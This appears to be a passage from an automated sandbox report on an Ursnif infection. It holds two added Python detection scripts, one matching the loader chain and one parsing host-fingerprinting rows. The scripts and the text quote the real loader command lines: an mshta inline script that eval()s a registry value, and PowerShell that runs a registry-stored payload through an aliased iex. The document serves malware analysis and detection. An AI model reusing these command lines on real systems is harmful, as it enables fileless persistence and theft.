Source: C:\Windows\System32\control.exe Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES1B16.tmp" "c:\Users\user\AppData\Local\Temp\uu5u2nmv\CSC63445C49B154491498BDD3FB79A78AC.TMP"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: unknown unknown
Source: C:\Windows\System32\control.exe Process created: unknown unknown
Source: C:\Windows\System32\control.exe Process created: unknown unknown
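The command lines in this section spell out the loader chain: mshta.exe runs an inline "about:<hta:application>" script that regread()s HKCU\Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E\MarkChart and eval()s it; that HTA spawns powershell.exe, which aliases gp and iex under random names, reads the UtilDiagram value of the same key and invokes the decoded string; the PowerShell stage compiles C# with csc.exe from a random %TEMP% folder (the pattern PowerShell's Add-Type produces); and the DLL hosts (rundll32.exe, regsvr32.exe) spawn control.exe -h, which the "Writes to foreign memory regions" entries show is the injection target. The Python below is an added example, not part of the report, that turns those observations into detection rules over Sysmon-style process-creation records and pulls the registry key and value names out as indicators. The event records are constructed: PIDs and the parent of mshta.exe (the report shows "unknown") are assumptions, the command lines are the ones listed above, and a benign PowerShell registry read is included as a negative control.

```python
import re
from dataclasses import dataclass, field


@dataclass
class ProcEvent:
    """One Sysmon-style process-creation record (constructed here, not from a sensor)."""
    pid: int
    parent_image: str
    image: str
    command_line: str


@dataclass
class Finding:
    rule: str
    pid: int
    detail: dict = field(default_factory=dict)


# Constructed events modelled on the report's process tree. Command lines are the
# report's; PIDs and the parent of mshta.exe ("unknown" in the report) are assumptions.
# The last event is a benign negative control.
EVENTS = [
    ProcEvent(100, "unknown", r"C:\Windows\System32\mshta.exe",
              r'''C:\Windows\System32\mshta.exe" "about:<hta:application><script>F7u2='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(F7u2).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>'''),
    ProcEvent(101, r"C:\Windows\System32\mshta.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r'''"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))'''),
    ProcEvent(102, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe",
              r'''C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wklr4juq\wklr4juq.cmdline'''),
    ProcEvent(103, r"C:\Windows\SysWOW64\rundll32.exe", r"C:\Windows\System32\control.exe",
              r"C:\Windows\system32\control.exe -h"),
    ProcEvent(200, r"C:\Windows\explorer.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r'''powershell.exe -NoProfile Get-ItemProperty "HKCU:Software\Microsoft\Windows\CurrentVersion\Run"'''),
]

HTA_INLINE_RE = re.compile(r"about:<hta:application>", re.I)
REGREAD_RE = re.compile(r"regread\('([^']+)'\)", re.I)
NEW_ALIAS_RE = re.compile(r"new-alias\s+-name\s+(\S+)\s+-value\s+([^\s;]+)", re.I)
# (gp "HKCU:...").ValueName  ->  key, value name
REG_PROVIDER_RE = re.compile(r'"(HK(?:CU|LM|U|CR|CC):[^"]+)"\)\.(\w+)', re.I)
TEMP_CMDLINE_RE = re.compile(r"\\AppData\\Local\\Temp\\[^\\]+\\[^\\]+\.cmdline", re.I)
IEX_NAMES = {"iex", "invoke-expression"}
DLL_HOSTS = {"rundll32.exe", "regsvr32.exe", "loaddll32.exe"}


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def normalize_reg_path(path):
    """JScript string escaping leaves runs of backslashes; collapse each run to one."""
    return re.sub(r"\\+", r"\\", path)


def rule_mshta_registry_loader(ev):
    """Inline HTA passed on the command line that reads a registry value and eval()s it."""
    if basename(ev.image) != "mshta.exe" or not HTA_INLINE_RE.search(ev.command_line):
        return None
    m = REGREAD_RE.search(ev.command_line)
    return Finding("mshta_inline_hta_reads_registry", ev.pid,
                   {"registry_value": normalize_reg_path(m.group(1)) if m else None})


def rule_powershell_registry_iex(ev):
    """PowerShell that aliases iex, reads a registry value via the registry provider and invokes it."""
    if basename(ev.image) != "powershell.exe":
        return None
    cl = ev.command_line
    aliases = {n.lower(): t.lower() for n, t in NEW_ALIAS_RE.findall(cl)}
    iex_aliases = {a for a, t in aliases.items() if t in IEX_NAMES}
    uses_iex = any(re.search(rf"(?<![\w-]){re.escape(a)}\s*\(", cl, re.I)
                   for a in iex_aliases | IEX_NAMES)
    m = REG_PROVIDER_RE.search(cl)
    if not (uses_iex and m):
        return None
    return Finding("powershell_iex_registry_payload", ev.pid,
                   {"registry_key": m.group(1), "value_name": m.group(2),
                    "iex_aliases": sorted(iex_aliases),
                    "parent_is_mshta": basename(ev.parent_image) == "mshta.exe"})


def rule_csc_from_powershell_temp(ev):
    """csc.exe launched by PowerShell with a response file under %TEMP% (Add-Type compile)."""
    if basename(ev.image) != "csc.exe" or basename(ev.parent_image) != "powershell.exe":
        return None
    m = TEMP_CMDLINE_RE.search(ev.command_line)
    return Finding("powershell_add_type_compile_in_temp", ev.pid, {"response_file": m.group(0)}) if m else None


def rule_control_spawned_by_dll_host(ev):
    """control.exe started by a DLL host process: the injection target seen in the report."""
    if basename(ev.image) != "control.exe" or basename(ev.parent_image) not in DLL_HOSTS:
        return None
    return Finding("control_exe_spawned_by_dll_host", ev.pid, {"parent": basename(ev.parent_image)})


RULES = [rule_mshta_registry_loader, rule_powershell_registry_iex,
         rule_csc_from_powershell_temp, rule_control_spawned_by_dll_host]


def scan(events):
    """Apply every rule to every event; return the findings in event order."""
    return [f for ev in events for f in (rule(ev) for rule in RULES) if f]


if __name__ == "__main__":
    for f in scan(EVENTS):
        print(f.rule, f.pid, f.detail)
```

The registry key and value names extracted by the first two rules are the fileless persistence indicators worth hunting for across a fleet; the alias resolution in the PowerShell rule matters because the visible command line never contains the literal token iex followed by an argument, only the randomly named alias.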

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Contains functionality to query CPU information (cpuid)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_00F1A303 cpuid 4_2_00F1A303
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_00F13A79 HeapFree,GetSystemTimeAsFileTime,HeapFree, 4_2_00F13A79
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_00F14638 GetVersion,lstrcat,lstrcat,lstrcat,GetLastError, 4_2_00F14638
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_00F1A303 RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree, 4_2_00F1A303
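The volume-information rows, the cpuid row and the rows listed after it (MachineGuid read, GetVersion, GetUserNameW/GetComputerNameW) all contribute host-identity data, and together they are what a triage script should pull out of a report. The Python below is an added example, not part of the report and not the sample's code: it parses the three row layouts seen here, collapses the repeated volume-information rows to the distinct targets per process, joins the "Code function" rows by function id so that a function listed once with cpuid and once with GetUserNameW/GetComputerNameW is seen as one function, and flags functions that combine two or more identity components. The grouping of APIs into components, the two-component threshold and the choice of MachineGuid as a registry identity value are the example's own; the input rows are copied from this section (only a few of the repeated volume rows are included).

```python
import re
from collections import defaultdict
from typing import Dict, List, Set, Tuple

# Constructed input: rows copied from this report section. A few of the repeated
# volume-information rows are enough to show the deduplication; the 'Code function'
# and 'Key value queried' rows are the ones listed above.
SAMPLE_ROWS = [
    r'Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation',
    r'Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation',
    r'Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation',
    r'Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation',
    r'Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation',
    r'Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_00F1A303 cpuid 4_2_00F1A303',
    r'Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid',
    r'Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_00F13A79 HeapFree,GetSystemTimeAsFileTime,HeapFree, 4_2_00F13A79',
    r'Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_00F14638 GetVersion,lstrcat,lstrcat,lstrcat,GetLastError, 4_2_00F14638',
    r'Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_00F1A303 RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree, 4_2_00F1A303',
]

VOLUME_RE = re.compile(r'^Source: (?P<proc>\S+) Queries volume information: (?P<target>.+?) VolumeInformation$')
# A 'Code function' row repeats the function id after the comma-separated API list.
FUNCTION_RE = re.compile(r'^Source: (?P<proc>\S+) Code function: (?P<fid>\S+) (?P<apis>.*?) (?P=fid)$')
REGISTRY_RE = re.compile(r'^Source: (?P<proc>\S+) Key value queried: (?P<key>\S+) (?P<value>\S+)$')

# APIs whose results identify the host, grouped by the identity component they yield.
# The grouping and the two-component threshold below are this example's own choices.
IDENTITY_APIS: Dict[str, str] = {
    'cpuid': 'cpu',
    'GetUserNameA': 'user', 'GetUserNameW': 'user',
    'GetComputerNameA': 'computer', 'GetComputerNameW': 'computer',
    'GetComputerNameExA': 'computer', 'GetComputerNameExW': 'computer',
    'GetVersion': 'os-version', 'GetVersionExA': 'os-version', 'GetVersionExW': 'os-version',
    'GetVolumeInformationA': 'volume-serial', 'GetVolumeInformationW': 'volume-serial',
}
IDENTITY_REGISTRY_VALUES = {'MachineGuid'}


def analyze(rows: List[str]) -> dict:
    volume_targets: Dict[str, Set[str]] = defaultdict(set)   # process -> distinct targets
    function_apis: Dict[str, Set[str]] = defaultdict(set)    # function id -> APIs seen
    function_proc: Dict[str, str] = {}
    machine_ids: List[Tuple[str, str, str]] = []
    for row in rows:
        row = row.strip()
        if m := VOLUME_RE.match(row):
            volume_targets[m['proc']].add(m['target'])
        elif m := FUNCTION_RE.match(row):
            function_apis[m['fid']] |= {a for a in m['apis'].split(',') if a}
            function_proc[m['fid']] = m['proc']
        elif m := REGISTRY_RE.match(row):
            if m['value'] in IDENTITY_REGISTRY_VALUES:
                machine_ids.append((m['proc'], m['key'], m['value']))
    # A function that combines two or more identity components reads like a
    # host-fingerprint builder rather than an incidental version check.
    fingerprint_functions = {}
    for fid, apis in function_apis.items():
        components = {IDENTITY_APIS[a] for a in apis if a in IDENTITY_APIS}
        if len(components) >= 2:
            fingerprint_functions[fid] = {'process': function_proc[fid], 'components': components}
    return {
        'volume_targets': dict(volume_targets),
        'fingerprint_functions': fingerprint_functions,
        'machine_ids': machine_ids,
    }


if __name__ == '__main__':
    result = analyze(SAMPLE_ROWS)
    for proc, targets in result['volume_targets'].items():
        print(f'{proc}: {len(targets)} distinct volume-information targets')
    for fid, info in result['fingerprint_functions'].items():
        print(f"{fid} in {info['process']}: {sorted(info['components'])}")
    for proc, key, value in result['machine_ids']:
        print(f'{proc} read {key}\\{value}')
```

Joining by function id is the point: 4_2_00F1A303 appears in two rows, one for cpuid and one for the user and computer name calls, and only the union shows it collecting three identity components, while 4_2_00F14638 (GetVersion only) stays below the threshold.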

Stealing of Sensitive Information:

Yara detected Ursnif
Source: Yara match File source: 00000004.00000003.364280068.000000000557D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.316367709.00000000059A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.482173365.000000000557D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.364396735.000000000507D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.317676885.00000000039A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.363061307.000000000372D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.482158894.000000000572D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.418329153.0000000005C78000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.363790330.000000000572D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.340116197.000000000517B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.316726446.00000000057F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.363641305.000000000507D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.434428828.0000000004A88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.418350281.0000000006148000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.316760481.00000000052F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.487230410.000000000507D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.364605530.000000000372D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.364538773.000000000572D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.339988265.000000000567B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.362673696.000000000557D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.364182389.000000000372D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.364803620.000000000507D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.418338276.0000000006518000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.339523552.000000000582B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.340805268.000000000382B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.487250466.000000000372D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.365593483.000000000557D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.362522995.000000000572D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 6360, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: regsvr32.exe PID: 6388, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 6400, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 6424, type: MEMORYSTR

Remote Access Functionality:

Yara detected Ursnif
Source: Yara match File source: 00000004.00000003.364280068.000000000557D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.316367709.00000000059A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.482173365.000000000557D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.364396735.000000000507D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.317676885.00000000039A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.363061307.000000000372D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.482158894.000000000572D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.418329153.0000000005C78000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.363790330.000000000572D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.340116197.000000000517B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.316726446.00000000057F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.363641305.000000000507D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.434428828.0000000004A88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.418350281.0000000006148000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.316760481.00000000052F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.487230410.000000000507D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.364605530.000000000372D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.364538773.000000000572D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.339988265.000000000567B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.362673696.000000000557D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.364182389.000000000372D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.364803620.000000000507D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.418338276.0000000006518000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.339523552.000000000582B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.340805268.000000000382B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.487250466.000000000372D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.365593483.000000000557D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.362522995.000000000572D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 6360, type: MEMORYSTR
